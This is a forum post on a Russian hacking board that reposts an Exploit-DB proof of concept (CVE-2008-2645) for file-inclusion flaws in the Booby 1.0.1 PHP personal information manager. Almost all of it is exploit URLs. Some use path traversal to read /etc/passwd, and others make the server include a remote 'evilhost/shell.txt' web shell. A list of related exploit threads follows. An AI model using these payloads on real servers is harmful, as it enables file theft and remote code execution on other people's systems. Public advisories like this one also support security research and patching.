Exploit Booby 1.0.1 - Multiple Remote File Inclusions

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5722
Проверка EDB
  1. Пройдено
Автор
HAIHUI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2645
Дата публикации
2008-06-02
Код: 
#software name: Booby
#version: 1.0.1
#description: A Webbased Personal Information Manager (PIM) with support for bookmarks, calendar, contacts, notes, news and tasks.
#download: http://sourceforge.net/project/showfiles.php?group_id=87672&package_id=91447&release_id=326826
#bug: Multiple Remote Vulnerabilities
#contact: [email protected]

Local File Include / Remote File Include in: template.tpl.php

Proof Of Concept LFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd

Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt



regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo /

# milw0rm.com [2008-06-02]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Vaidya-Mitra 1.0 - Multiple SQLi
Ответы
0
Просмотры
606
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Thesis Archiving System v1.0 - Multiple-SQLi
Ответы
0
Просмотры
619
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zenphoto 1.6 - Multiple stored XSS
Ответы
0
Просмотры
647
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Ответы
0
Просмотры
577
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
606
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
582
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Bang Resto v1.0 - 'Multiple' SQL Injection
Ответы
0
Просмотры
3K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
Ответы
0
Просмотры
991
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу